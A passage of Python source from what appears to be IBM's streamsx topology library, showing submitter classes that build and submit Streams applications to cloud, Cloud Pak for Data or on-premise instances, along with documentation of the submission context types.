jul_cfg = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.properties')
jul = '-Djava.util.logging.config.file=' + jul_cfg
args = [jvm, '-classpath', cp, jul, submit_class, self.ctxtype, self.fn, str(logging.getLogger().getEffectiveLevel())]
logger.info("Generating SPL and submitting application.")
proc_env = self._get_java_env()
process = subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, env=proc_env)
stderr_thread = threading.Thread(target=_print_process_stderr, args=([process, self, progress_fn]))
stderr_thread.daemon = True
stderr_thread.start()
stdout_thread = threading.Thread(target=_print_process_stdout, args=([process]))
stdout_thread.daemon = True
stdout_thread.start()
process.wait()
results_json = {}
# Only try to read the results file if the submit was successful.
if process.returncode == 0:
with open(self.results_file) as _file:
try:
results_json = json.loads(_file.read())
progress_fn(True)
except IOError:
logger.error("Could not read file:" + str(_file.name))
progress_fn(False)
raise
except json.JSONDecodeError:
logger.error("Could not parse results file:" + str(_file.name))
progress_fn(False)
raise
except:
logger.error("Unknown error while processing results file.")
progress_fn(False)
raise
else:
progress_fn(False)
results_json['return_code'] = process.returncode
self._augment_submission_result(results_json)
self.submission_results = results_json
return results_json
def _augment_submission_result(self, submission_result):
"""Allow a subclass to augment a submission result"""
pass
def _get_java_env(self):
"Get the environment to be passed to the Java execution"
return os.environ.copy()
def _add_python_info(self):
# Python information added to deployment
pi = {}
pi["prefix"] = sys.exec_prefix
pi["version"] = sys.version
pi['major'] = sys.version_info.major
pi['minor'] = sys.version_info.minor
self.config["python"] = pi
def _create_job_config_overlays(self):
if ConfigParams.JOB_CONFIG in self.config:
jco = self.config[ConfigParams.JOB_CONFIG]
del self.config[ConfigParams.JOB_CONFIG]
jco._add_overlays(self.config)
def _create_full_json(self):
fj = dict()
# Removing Streams Connection object because it is not JSON serializable, and not applicable for submission
# Need to re-add it, since the StreamsConnection needs to be returned from the submit.
sc = self.config.pop(ConfigParams.STREAMS_CONNECTION, None)
fj["deploy"] = self.config.copy()
fj["graph"] = self.graph.generateSPLGraph()
_file = tempfile.NamedTemporaryFile(prefix="results", suffix=".json", mode="w+t", delete=False)
_file.close()
fj["submissionResultsFile"] = _file.name
self.results_file = _file.name
logger.debug("Results file created at " + _file.name)
if sc is not None:
self.config[ConfigParams.STREAMS_CONNECTION] = sc
return fj
def _create_json_file(self, fj):
if sys.hexversion < 0x03000000:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", prefix="splpytmp", delete=False)
else:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", encoding="UTF-8", prefix="splpytmp",
delete=False)
tf.write(json.dumps(fj, sort_keys=True, indent=2, separators=(',', ': ')))
tf.close()
self.fn = tf.name
def _setup_views(self):
# Link each view back to this context.
for view in self.graph._views:
view.stop_data_fetch()
view._submit_context = self
def streams_connection(self):
raise NotImplementedError("Views require submission to DISTRIBUTED or ANALYTICS_SERVICE context")
# There are two modes for execution.
#
# Pypi (Python focused)
# Pypi (pip install) package includes the SPL toolkit as
# streamsx/.toolkit/com.ibm.streamsx.topology
# However the streamsx Python packages have been moved out
# of the toolkit's (opt/python/package) compared
# to the original toolkit layout. They are moved to the
# top level of the pypi package.
#
# SPL Toolkit (SPL focused):
# Streamsx Python packages are executed from opt/python/packages
#
# This function determines the root of the SPL toolkit based
# upon the existance of the '.toolkit' directory.
#
@staticmethod
def _get_toolkit_root():
# Directory of this file (streamsx/topology)
dir = os.path.dirname(os.path.abspath(__file__))
# This is streamsx
dir = os.path.dirname(dir)
# See if .toolkit exists, if so executing from
# a pip install
tk_root = os.path.join(dir, '.toolkit', 'com.ibm.streamsx.topology')
if os.path.isdir(tk_root):
return tk_root
# Else dir is tk/opt/python/packages/streamsx
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
tk_root = os.path.dirname(dir)
return tk_root
class _StreamingAnalyticsSubmitter(_BaseSubmitter):
"""
A submitter supports the ANALYTICS_SERVICE (Streaming Analytics service) context.
"""
# Maintains the last time by service in ms since epoch the last
# time a thread saw the service running. Allows avoidance of
# status checks when we are somewhat confident the service
# is running, eg. during test runs or repeated submissions.
_SERVICE_ACTIVE = threading.local()
def __init__(self, ctxtype, config, graph):
super(_StreamingAnalyticsSubmitter, self).__init__(ctxtype, config, graph)
self._streams_connection = self._config().get(ConfigParams.STREAMS_CONNECTION)
if ConfigParams.SERVICE_DEFINITION in self._config():
# Convert the service definition to a VCAP services definition.
# Which is then passed through to Java as a VCAP_SERVICES env var
# Service name matching the generated VCAP is passed through config.
service_def = self._config().get(ConfigParams.SERVICE_DEFINITION)
self._vcap_services = _vcap_from_service_definition(service_def)
self._config()[ConfigParams.SERVICE_NAME] = _name_from_service_definition(service_def)
else:
self._vcap_services = self._config().get(ConfigParams.VCAP_SERVICES)
self._service_name = self._config().get(ConfigParams.SERVICE_NAME)
if self._streams_connection is not None:
if not isinstance(self._streams_connection, streamsx.rest.StreamingAnalyticsConnection):
raise ValueError("config must contain a StreamingAnalyticsConnection object when submitting to "
"{} context".format(ctxtype))
# Use credentials stored within StreamingAnalyticsConnection
self._service_name = self._streams_connection.service_name
self._vcap_services = {'streaming-analytics': [
{'name': self._service_name, 'credentials': self._streams_connection.credentials}
]}
self._config()[ConfigParams.SERVICE_NAME] = self._service_name
# TODO: Compare credentials between the config and StreamsConnection, verify they are the same
# Clear the VCAP_SERVICES key in config, since env var will contain the content
self._config().pop(ConfigParams.VCAP_SERVICES, None)
self._config().pop(ConfigParams.SERVICE_DEFINITION, None)
self._setup_views()
self._job = None
def _create_full_json(self):
fj = super(_StreamingAnalyticsSubmitter, self)._create_full_json()
if hasattr(_StreamingAnalyticsSubmitter._SERVICE_ACTIVE, 'running'):
rts = _StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running
if self._service_name in rts:
sn = self._service_name if self._service_name else os.environ['STREAMING_ANALYTICS_SERVICE_NAME']
fj['deploy']['serviceRunningTime'] = rts[sn]
return fj
def _job_access(self):
if self._job:
return self._job
if self._streams_connection is None:
self._streams_connection = streamsx.rest.StreamingAnalyticsConnection(self._vcap_services, self._service_name)
self._job = self._streams_connection.get_instances()[0].get_job(
id=self.submission_results['jobId'])
return self._job
def _augment_submission_result(self, submission_result):
vcap = streamsx.rest._get_vcap_services(self._vcap_services)
credentials = streamsx.rest._get_credentials(vcap, self._service_name)
if streamsx.rest_primitives._IAMConstants.V2_REST_URL in credentials:
instance_id = credentials[streamsx.rest_primitives._IAMConstants.V2_REST_URL].split('streaming_analytics/', 1)[1]
else:
instance_id = credentials['jobs_path'].split('/service_instances/', 1)[1].split('/', 1)[0]
submission_result['instanceId'] = instance_id
if 'jobId' in submission_result:
if not hasattr(_StreamingAnalyticsSubmitter._SERVICE_ACTIVE, 'running'):
_StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running = dict()
sn = self._service_name if self._service_name else os.environ['STREAMING_ANALYTICS_SERVICE_NAME']
_StreamingAnalyticsSubmitter._SERVICE_ACTIVE.running[sn] = int(time.time() * 1000.0)
def _get_java_env(self):
"Pass the VCAP through the environment to the java submission"
env = super(_StreamingAnalyticsSubmitter, self)._get_java_env()
vcap = streamsx.rest._get_vcap_services(self._vcap_services)
env['VCAP_SERVICES'] = json.dumps(vcap)
return env
class _BundleSubmitter(_BaseSubmitter):
"""
A submitter which supports the BUNDLE context
including remote build.
"""
def __init__(self, ctxtype, config, graph):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD)
if not self._remote and 'STREAMS_INSTALL' in os.environ:
return
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
if self._streams_connection is not None:
pass
else:
# Look for a service definition
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if not svc_info:
# Look for endpoint set by env vars.
inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if inst is not None:
self._streams_connection = inst.rest_client._sc
if isinstance(self._streams_connection, streamsx.rest.StreamsConnection):
if isinstance(self._streams_connection.session.auth, streamsx.rest_primitives._ICPDExternalAuthHandler):
svc_info = self._streams_connection.session.auth._cfg
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
if self._streams_connection.session.verify == False:
self._config()[ConfigParams.SSL_VERIFY] = False
else:
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
streamsx.rest_primitives.Instance._clear_service_info(self._config())
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_BundleSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
if self._remote:
env.pop('STREAMS_INSTALL', None)
return env
class _EdgeSubmitter(_BaseSubmitter):
"""
A submitter which supports the EDGE context (force remote build).
"""
def __init__(self, ctxtype, config, graph):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
config[ConfigParams.FORCE_REMOTE_BUILD] = True # EDGE is always remote build
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
if self._streams_connection is not None:
pass
else:
# Look for a service definition
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if not svc_info:
# Look for endpoint set by env vars.
inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if inst is not None:
self._streams_connection = inst.rest_client._sc
if isinstance(self._streams_connection, streamsx.rest.StreamsConnection):
if isinstance(self._streams_connection.session.auth, streamsx.rest_primitives._ICPDExternalAuthHandler):
svc_info = self._streams_connection.session.auth._cfg
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
if self._streams_connection.session.verify == False:
self._config()[ConfigParams.SSL_VERIFY] = False
else:
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
streamsx.rest_primitives.Instance._clear_service_info(self._config())
# check that serviceBuildPoolsEndpoint is set
try:
serviceBuildPoolsEndpoint = self._config()[ConfigParams.SERVICE_DEFINITION]['connection_info']['serviceBuildPoolsEndpoint']
except KeyError:
raise RuntimeError('Build service is not configured for EDGE submission')
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_EdgeSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
if self._remote:
env.pop('STREAMS_INSTALL', None)
return env
def _get_distributed_submitter(config, graph, username, password):
# CP4D integrated environment and within project
svc_info = streamsx.rest_primitives.Instance._find_service_def(config)
if svc_info:
return _DistributedSubmitterCP4DIntegratedProject(config, graph, svc_info)
# CP4D integrated environment external to project
if 'CP4D_URL' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ and \
'STREAMS_PASSWORD' in os.environ:
return _DistributedSubmitterCP4DIntegrated(config, graph)
# CP4D standalone environment
if 'STREAMS_REST_URL' in os.environ and \
'STREAMS_PASSWORD' in os.environ:
return _DistributedSubmitterCP4DStandalone(config, graph)
# Streams 4.2/4.3 by connection
if 'STREAMS_INSTALL' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ and \
ConfigParams.STREAMS_CONNECTION in config and \
isinstance(config[ConfigParams.STREAMS_CONNECTION], streamsx.rest.StreamsConnection):
return _DistributedSubmitter4Conn(config, graph, username, password)
# Streams 4.2/4.3 by environment
if 'STREAMS_INSTALL' in os.environ and \
'STREAMS_DOMAIN_ID' in os.environ and \
'STREAMS_INSTANCE_ID' in os.environ:
return _DistributedSubmitter4(config, graph, username, password)
raise RuntimeError('Insufficient configuration for DISTRIBUTED submission')
class _DistributedSubmitter(_BaseSubmitter):
"""
A submitter which supports the DISTRIBUTED context.
Sub-classed for specific configurations
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter, self).__init__(ContextTypes.DISTRIBUTED, config, graph)
self._streams_connection = None
self.username = username
self.password = password
self._job = None
# Give each view in the app the necessary information to connect to SWS.
self._setup_views()
def _job_access(self):
if self._job:
return self._job
instance = self._get_instance()
self._job = instance.get_job(id=self.submission_results['jobId'])
return self._job
class _DistributedSubmitterCP4DIntegratedProject(_DistributedSubmitter):
"""
A submitter which supports the CPD integrated configuration
within a project.
"""
def __init__(self, config, graph, svc_info):
super(_DistributedSubmitterCP4DIntegratedProject, self).__init__(config, graph, None, None)
# use the config here rather than svc_info as the config contains SSL_VERIFY
streams_instance = streamsx.rest_primitives.Instance.of_service(config)
if hasattr(streams_instance, 'productVersion'):
svc_info['productVersion'] = streams_instance.productVersion
# when we use the REST-API of the CP4D from inside the CP4D (Notebook in a project)
# we go over this URL: https://internal-nginx-svc:12443
svc_info['cluster_ip'] = 'internal-nginx-svc'
svc_info['cluster_port'] = 12443
# user-provided cp4d URL to override the hard-coded from above
if ConfigParams.CP4D_URL in config:
userUrl = config[ConfigParams.CP4D_URL]
if userUrl:
es = up.urlparse(userUrl)
if ':' in es.netloc:
cluster_ip = es.netloc.split(':')[0]
cluster_port = es.netloc.split(':')[1]
else:
cluster_ip = es.netloc
cluster_port = 443
svc_info['cluster_ip_orig'] = svc_info['cluster_ip']
svc_info['cluster_port_orig'] = svc_info['cluster_port']
svc_info['cluster_ip'] = cluster_ip
svc_info['cluster_port'] = cluster_port
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
streamsx.rest_primitives.Instance._clear_service_info(self._config())
def _get_instance(self):
return streamsx.rest_primitives.Instance.of_service(self._config())
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DIntegratedProject, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitterCP4DIntegrated(_DistributedSubmitter):
"""
A submitter which supports the CPD integrated configuration
outside a project.
"""
def __init__(self, config, graph):
super(_DistributedSubmitterCP4DIntegrated, self).__init__(config, graph, None, None)
# Look for endpoint set by env vars.
self._inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if self._inst is None:
raise ValueError("Incorrect configuration for Cloud Pak for Data integrated configuration")
self._streams_connection = self._inst.rest_client._sc
svc_info = self._streams_connection.session.auth._cfg
if hasattr(self._inst, 'productVersion'):
svc_info['productVersion'] = self._inst.productVersion
self._config()[ConfigParams.SERVICE_DEFINITION] = svc_info
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
def _get_instance(self):
return self._inst
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DIntegrated, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitterCP4DStandalone(_DistributedSubmitter):
"""
A submitter which supports the CPD standalone configuration.
"""
def __init__(self, config, graph):
super(_DistributedSubmitterCP4DStandalone, self).__init__(config, graph, None, None)
# Look for endpoint set by env vars.
self._inst = streamsx.rest_primitives.Instance.of_endpoint(verify=config.get(ConfigParams.SSL_VERIFY))
if self._inst is None:
raise ValueError("Incorrect configuration for Cloud Pak for Data standalone configuration")
self._streams_connection = self._inst.rest_client._sc
self._config()[ConfigParams.FORCE_REMOTE_BUILD] = True
def _get_instance(self):
return self._inst
def _get_java_env(self):
env = super(_DistributedSubmitterCP4DStandalone, self)._get_java_env()
env.pop('CP4D_URL', None)
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
class _DistributedSubmitter4(_DistributedSubmitter):
"""
A submitter which supports the DISTRIBUTED context
for IBM Streams 4.2/4.3.
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter4, self).__init__(config, graph, username, password)
def _get_instance(self):
if not self._streams_connection:
self._streams_connection = streamsx.rest.StreamsConnection(self.username, self.password)
if ConfigParams.SSL_VERIFY in self._config():
self._streams_connection.session.verify = self._config()[ConfigParams.SSL_VERIFY]
return self._streams_connection.get_instance(os.environ['STREAMS_INSTANCE_ID'])
class _DistributedSubmitter4Conn(_DistributedSubmitter4):
"""
A submitter which supports the DISTRIBUTED context
for IBM Streams 4.2/4.3 using a connection.
"""
def __init__(self, config, graph, username, password):
super(_DistributedSubmitter4Conn, self).__init__(config, graph, username, password)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
self.username = self._streams_connection.session.auth[0]
self.password = self._streams_connection.session.auth[1]
if (username is not None and username != self.username) or (password is not None and password != self.password):
raise RuntimeError('Credentials supplied in the arguments differ than '
'those specified in the StreamsConnection object')
def _get_instance(self):
iid = os.environ.get('STREAMS_INSTANCE_ID')
return self._streams_connection.get_instance(id=iid)
def _get_java_env(self):
env = super(_DistributedSubmitter4Conn, self)._get_java_env()
# Need to sure the environment matches the connection.
sc = self._streams_connection
env['STREAMS_DOMAIN_ID'] = sc.get_domains()[0].id
return env
class _SubmitContextFactory(object):
"""
ContextSubmitter:
Responsible for performing the correct submission depending on a number of factors, including: the
presence/absence of a streams install, the type of context, and whether the user seeks to retrieve data via rest
"""
def __init__(self, graph, config=None, username=None, password=None):
self.graph = graph
self.config = config
self.username = username
self.password = password
if self.config is None:
self.config = {}
def get_submit_context(self, ctxtype):
# If there is no streams install present, currently only ANALYTICS_SERVICE, TOOLKIT, and BUILD_ARCHIVE
# are supported.
streams_install = os.environ.get('STREAMS_INSTALL')
if streams_install is None:
if ctxtype == ContextTypes.STANDALONE:
raise ValueError(ctxtype + " must be submitted when an IBM Streams install is present.")
if ctxtype == ContextTypes.DISTRIBUTED:
logger.debug("Selecting the DISTRIBUTED context for submission")
return _get_distributed_submitter(self.config, self.graph, self.username, self.password)
elif ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE:
logger.debug("Selecting the STREAMING_ANALYTICS_SERVICE context for submission")
ctxtype = ContextTypes.STREAMING_ANALYTICS_SERVICE
return _StreamingAnalyticsSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'BUNDLE':
logger.debug("Selecting the BUNDLE context for submission")
if 'CP4D_URL' in os.environ:
return _BundleSubmitter(ctxtype, self.config, self.graph)
if 'VCAP_SERVICES' in os.environ or \
ConfigParams.VCAP_SERVICES in self.config or \
ConfigParams.SERVICE_DEFINITION in self.config:
sbs = _SasBundleSubmitter(self.config, self.graph)
if sbs._remote:
return sbs
return _BundleSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'EDGE':
logger.debug("Selecting the EDGE context for submission")
return _EdgeSubmitter(ctxtype, self.config, self.graph)
elif ctxtype == 'EDGE_BUNDLE':
logger.debug("Selecting the EDGE_BUNDLE context for submission")
return _EdgeSubmitter(ctxtype, self.config, self.graph)
else:
logger.debug("Using the BaseSubmitter, and passing the context type through to java.")
return _BaseSubmitter(ctxtype, self.config, self.graph)
# Used to delete the JSON file after it is no longer needed.
def _delete_json(submitter):
for fn in [submitter.fn, submitter.results_file]:
if fn and os.path.isfile(fn):
os.remove(fn)
# Used by a thread which polls a subprocess's stdout and writes it to stdout
def _print_process_stdout(process):
try:
while True:
line = process.stdout.readline()
if len(line) == 0:
process.stdout.close()
break
line = line.decode("utf-8").strip()
print(line)
except:
logger.error("Error reading from Java subprocess stdout stream.")
raise
finally:
process.stdout.close()
_JAVA_LOG_LVL = {
# java.util.logging
'SEVERE': logging.ERROR,
'WARNING': logging.WARNING,
'INFO':logging.INFO, 'CONFIG':logging.INFO,
'FINE:':logging.DEBUG, 'FINER':logging.DEBUG, 'FINEST':logging.DEBUG,
'FATAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'DEBUG:':logging.DEBUG, 'TRACE':logging.DEBUG
}
# Used by a thread which polls a subprocess's stderr and writes it to
# a logger or stderr
def _print_process_stderr(process, submitter, progress_fn):
try:
while True:
line = process.stderr.readline()
if len(line) == 0:
process.stderr.close()
break
line = line.decode("utf-8").strip()
em = line.rstrip().split(': ', 1)
if len(em) == 2 and em[0] in _JAVA_LOG_LVL:
if 'INFO' == em[0] and em[1].startswith('!!-streamsx-'):
progress_fn(em[1])
continue
logger.log(_JAVA_LOG_LVL[em[0]], em[1])
continue
print(line, file=sys.stderr)
except:
logger.error("Error reading from Java subprocess stderr stream.")
raise
finally:
process.stderr.close()
class ContextTypes(object):
"""
Submission context types.
A :py:class:`~streamsx.topology.topology.Topology` is submitted using :py:func:`submit` and a context type.
Submision of a `Topology` generally builds the application into a Streams application
bundle (sab) file and then submits it for execution in the required context.
The Streams application bundle contains all the artifacts required by an application such
that it can be executed remotely (e.g. on a Streaming Analytics service), including
distributing the execution of the application across multiple resources (hosts).
The context type defines which context is used for submission.
The main context types result in a running application and are:
* :py:const:`STREAMING_ANALYTICS_SERVICE` - Application is submitted to a Streaming Analytics service running on IBM Cloud.
* :py:const:`DISTRIBUTED` - Application is submitted to an IBM Streams instance.
* :py:const:`STANDALONE` - Application is executed as a local process, IBM Streams `standalone` application. Typically this is used during development or testing.
The :py:const:`BUNDLE` context type compiles the application (`Topology`) to produce a
Streams application bundle (sab file). The bundle is not executed but may subsequently be submitted
to a Streaming Analytics service or an IBM Streams instance. A bundle may be submitted multiple
times to services or instances, each resulting in a unique job (running application).
"""
STREAMING_ANALYTICS_SERVICE = 'STREAMING_ANALYTICS_SERVICE'
"""Submission to Streaming Analytics service running on IBM Cloud.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is submitted for execution on the Streaming Analytics service.
When **STREAMS_INSTALL** is not set or the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `True` the compilation of the application
occurs remotely by the service. This allows creation and submission of Streams applications
without a local install of IBM Streams.
When **STREAMS_INSTALL** is set and the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `False` or not set then the creation of the
Streams application bundle occurs locally and the bundle is submitted for execution on the service.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - (optional) Location of a IBM Streams installation (4.0.1 or later). The install must be running on RedHat/CentOS 7 and `x86_64` architecture.
"""
DISTRIBUTED = 'DISTRIBUTED'
"""Submission to an IBM Streams instance.
.. rubric:: IBM Cloud Pak for Data integated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service and submitted
to an Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.DISTRIBUTED, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
a :py:class:`JobConfig` or keys from :py:class:`ConfigParams`.
*External to cluster or project*
The `Topology` is compiled using the Streams build service and submitted
to a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Cloud Pak for Data standalone configuration
The `Topology` is compiled using the Streams build service and submitted
to a Streams service instance using REST apis.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_BUILD_URL** - Streams build service URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_REST_URL** - Streams SWS service (REST API) URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Streams on-premise 4.2 & 4.3
The `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.2 or 4.3).
* **STREAMS_DOMAIN_ID** - Domain identifier for the Streams instance.
* **STREAMS_INSTANCE_ID** - Instance identifier.
* **STREAMS_ZKCONNECT** - (optional) ZooKeeper connection string for domain (when not using an embedded ZooKeeper)
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
.. warning::
``streamtool`` is used to submit the job with on-premise 4.2 & 4.3 Streams and requires that ``streamtool`` does not prompt for authentication. This is achieved by using ``streamtool genkey``.
.. seealso::
`Generating authentication keys for IBM Streams <https://www.ibm.com/support/knowledgecenter/SSCRJU_4.2.1/com.ibm.streams.cfg.doc/doc/ibminfospherestreams-user-security-authentication-rsa.html>`_
"""
STANDALONE = 'STANDALONE'
"""Build and execute locally.
Compiles and executes the `Topology` locally in IBM Streams standalone mode as a separate sub-process.
Typically used for devlopment and testing.
The call to :py:func:`submit` return when (if) the application completes. An application
completes when it has finite source streams and all tuples from those streams have been
processed by the complete topology. If the source streams are infinite (e.g. reading tweets)
then the standalone application will not complete.
Environment variables:
This environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.0.1 or later).
"""
BUNDLE = 'BUNDLE'
"""Create a Streams application bundle.
The `Topology` is compiled to produce Streams application bundle (sab file).
The resultant application can be submitted to:
* Streaming Analytics service using the Streams console or the Streaming Analytics REST api.
* IBM Streams instance using the Streams console, JMX api or command line ``streamtool submitjob``.
* Executed standalone for development or testing.
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 7 and `x86_64` architecture.
.. rubric:: IBM Cloud Pak for Data integated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service for
a Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.BUNDLE, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
keys from :py:class:`ConfigParams`.
*External to cluster or project*
The `Topology` is compiled using the Streams build service for a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Cloud Pak for Data standalone configuration
The `Topology` is compiled using the Streams build service.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_BUILD_URL** - Streams build service URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Streams on-premise 4.2 & 4.3
The `Topology` is compiled using a local IBM Streams installation.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a local IBM Streams installation.
"""
TOOLKIT = 'TOOLKIT'
"""Creates an SPL toolkit.
`Topology` applications are implemented as an SPL application before compilation into an Streams application
bundle. This context type produces the intermediate SPL toolkit that is input to the SPL compiler for
bundle creation.
.. note::
`TOOLKIT` is typically only used when diagnosing issues with bundle generation.
"""
BUILD_ARCHIVE = 'BUILD_ARCHIVE'
"""Creates a build archive.
This context type produces the intermediate code archive used for bundle creation.
.. note::
`BUILD_ARCHIVE` is typically only used when diagnosing issues with bundle generation.
"""
EDGE = 'EDGE'
"""Submission to build service running on IBM Cloud Pak for Data to create an image for Edge.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is added to an image for Edge.
.. rubric:: IBM Cloud Pak for Data integated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service for
a Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from streamsx.topology.context import submit, ContextTypes
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.EDGE, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
keys from :py:class:`ConfigParams` or :py:class:`JobConfig`.
For example, apply `imageName` and `imageTag`::
from streamsx.topology.context import submit, ContextTypes, JobConfig
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
jc = JobConfig()
jc.raw_overlay = {'edgeConfig': {'imageName':'py-sample-app', 'imageTag':'v1.0'}}
jc.add(cfg)
submit(ContextTypes.EDGE, topo, cfg)
*External to cluster or project*
The `Topology` is compiled using the Streams build service for a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
Example code to query the base images::
from streamsx.build import BuildService
bs = BuildService.of_endpoint(verify=False)
baseImages = bs.get_base_images()
print('# images = ' + str(len(baseImages)))
for i in baseImages:
print(i.id)
print(i.registry)
Example code to select a base image for the image build::
from streamsx.topology.context import submit, ContextTypes, JobConfig
topo = Topology()
...
jc = JobConfig()
